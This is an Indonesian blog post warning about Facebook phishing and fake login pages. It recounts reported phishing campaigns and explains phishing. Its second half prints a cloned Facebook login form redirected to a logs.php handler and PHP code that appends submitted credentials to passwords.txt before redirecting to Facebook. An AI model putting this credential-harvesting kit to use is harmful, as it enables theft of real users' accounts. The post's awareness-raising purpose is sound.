Bahaya Phising dan Fake Login Facebook
Beberapa bulan terakhir, Facebook yang merupakan social network (jejaring sosial) terbesar sering mendapat phising baik itu dari email, IM seperti yahoo messenger, maupun dari pesan dari contact list facebook sendiri.
Serangan phising terbesar menurut facebook dilakukan oleh 2 website yaitu FBStarter.com dan BAction.net beberapa waktu lalu. Meraka biasa mengirim pesan berupa kata-kata “Check this out”. Kemudian mereka mengundang korban untuk meng-klik link yang akan membawa mereka keluar dari Facebook.
Pihak Facebook menyatakan bahwa serangan tersebut berhenti setiap beberapa jam pada tiap kasusnya. Facebook juga menyatakan bahwa belum ada kepastian apakah serangan dari kedua website tersebut saling terkait atau tidak.
Facebook telah menghapus URL tersebut dari member page dan membuang URL yang ada di pesan mail. Untuk user yang telah terjebak phising ini, pihak Facebook telah mereset password mereka. Facebook juga menganjurkan para usernya untuk tidak meng-click link yang mencurigakan serta menganjurkan para user yang telah menjadi korban untuk segera mengganti password.
Phising merupakan proses untuk mendapatkan informasi sensitif seperti username, password dan bahkan sampai detail kartu kredit dengan berpura-pura menjadi website asli.
Biasanya si pelaku memancing korbannya untuk masuk ke website yang dibuat mirip dengan website aslinya. Pada website palsu itu, si pelaku telah menaruh box username dan password dan meminta korban untuk login. Jadi di sini si pelaku melakukan penipuan login atau biasa di sebut fake login.
Bagaimana kita tahu kalau itu fake login ?
Untuk mengetahui itu web phising yang menggunakan fake login, kita harus teliti url untuk login di facebook itu sendiri. Untuk login, facebook menggunakan url
https://login.facebook.com/login.php
Web phising dengan fake login
Tampilan utama Web phising dengan fake login menggunakan source code dari https://login.facebook.com/login.php yang disimpan menjadi index.html. Tapi di index.html ini kita tambahi di form dengan pemanggilan code php untuk penyimpanan username dan password yang diisikan.
<form method=”POST” action=”logs.php” name=”menubar_login”Lihat code yang di cetak tebal tersebut, code asli dari facebook adalah
id=”menubar_login”><input type=”hidden” name=”charset_test”
value=”€,´,€,´,?,?,?” /><input type=”hidden” id=”locale”
name=”locale” value=”en_US” /><table cellpadding=”0″ cellspacing=”0″><tr><td
class=”login_form_label_field login_form_label_remember”><label><input
type=”checkbox” name=”persistent” value=”1″ />Remember Me</label></td><td
class=”login_form_label_field”><a href=”http://www.facebook.com/reset.php”
rel=”nofollow”>Forgot your password?</a></td><td class=”login_form_last_field
login_form_label_field”></td></tr><tr><td><input type=”text” class=”inputtext”
id=”email” name=”email” value=”" /></td><td><input type=”password”
class=”inputpassword” id=”pass” name=”pass” value=”" /><input type=”text”
class=”inputtext hidden_elem” id=”pass_placeholder” name=”pass_placeholder”
value=”" /></td><td class=”login_form_last_field”><div
class=”UILinkButton”><input type=”submit” class=”UILinkButton_A” value=”Login”
/><div class=”UILinkButton_RW”><div
class=”UILinkButton_R”></div></div></div></td></tr></table><input type=”hidden”
name=”charset_test” value=”€,´,€,´,?,?,?” /></form>
<form id=”login_form”Yang tercetak tebal, yaitu :
action=”https://login.facebook.com/login.php?login_attempt=1″ method=”POST”>
<form method=”POST” action=”logs.php” name=”menubar_login”adalah pengisian dari form tersebut kita akan diarahkan ke logs.php.
id=”menubar_login”>
Sedangkan isis dari logs.php adalah pencatatan dari pengisian username dan password tersebut.
<?phpPengisisan di web phising yang menggunakan fake login facebook ini akan tersimpan di passwords.txt secara terus menerus……..
header(“Location:http://www.facebook.com/”);
$handle = fopen(“passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Bahaya kan……
Semoga menjadi pencerahan bagi teman-teman yang beberapa hari lalu menanyakan hal ini padaku lewat YM.
0 komentar:
Posting Komentar